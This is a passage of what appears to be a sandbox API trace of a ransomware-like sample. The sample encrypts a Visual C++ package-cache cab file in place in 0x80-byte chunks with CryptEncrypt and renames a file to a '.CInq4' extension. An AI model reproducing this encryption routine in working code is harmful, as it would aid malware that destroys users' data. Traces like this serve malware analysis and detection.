lpNewFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.CInq4" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.cinq4")) returned 1 [0041.912] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0041.912] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0041.912] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.050] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.050] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.050] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.051] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.051] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.051] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.051] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.051] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.051] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.051] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.051] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.051] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.052] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.052] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.052] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.052] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.052] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.052] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.052] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.052] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.052] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.053] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.053] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.053] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.053] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.053] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.053] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.053] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.053] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.054] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.054] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.054] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.054] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.054] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.054] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.054] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.054] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.054] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.055] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.072] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: 